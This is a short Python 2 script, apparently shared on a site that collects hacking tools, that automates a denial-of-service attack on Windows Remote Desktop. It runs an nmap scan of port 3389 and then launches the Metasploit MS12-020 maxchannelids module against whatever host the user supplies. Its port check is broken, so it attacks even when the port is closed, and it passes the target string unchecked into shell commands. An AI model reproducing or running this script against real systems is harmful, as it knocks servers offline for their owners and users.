Rdp Exploit

1. #!/usr/bin/python
2. # jutthaxor@gmail.com
3. import os,sys,re,subprocess
4. print '''
5. +-+-+-+ +-+-+-+-+-+-+-+-+-+-+-+ +-+-+ +-+-+-+-+-+-+
6. |R|d|p| |A|u|t|o|E|x|p|l|o|i|t| |B|y| |S|t|o|k|e|r|
7. +-+-+-+ +-+-+-+-+-+-+-+-+-+-+-+ +-+-+ +-+-+-+-+-+-+
8. [!] Author - Muhammad Adeel aka Stoker
9. [!] Mail   - jutthaxor@gmail.com
10. [!] Greetz - Team Xploiters
11.  
12. [!] P.S : This Exploit is Based on => auxiliary/dos/windows/rdp/ms12_020_maxchannelids <='''
13. if os.getuid() != 0:
14.     print '\n\t\t[UnSufficient Priviliges]Error:You are Not Root!\n'
15.     sys.exit(1)
16. def help():
17.   if len(sys.argv) != 2:
18.     print """
19.    [!]Usage -   ./script.py [Target Host]
20.    [!]Example - ./script.py 127.0.0.1\n"""
21.     sys.exit(1)
22. help()
23. RHOST = sys.argv[1]
24. nmap = subprocess.Popen('nmap -p3389 %s -oN /tmp/nmap.txt' %RHOST, shell=True).wait()
25. nmapresul = open('/tmp/nmap.txt', 'rU')
26. found = nmapresul.read()
27. vulnerability = re.search(r'3389[/]tcp\sopen', found)
28. if not found:
29.   print "\n[!] Port 3389 is Close."
30.   sys.exit(1)
31. print '\n[!] Port Is Open. Let me try AutoRdp Exploit'
32. metasploit = subprocess.Popen('msfcli auxiliary/dos/windows/rdp/ms12_020_maxchannelids  RHOST=%s  RPORT=3389 E' %RHOST, shell=True).wait()
33. subprocess.Popen('rm -f /tmp/nmap.txt > /dev/null', shell=True).wait()
34. end = raw_input('Hit Enter to Exit.')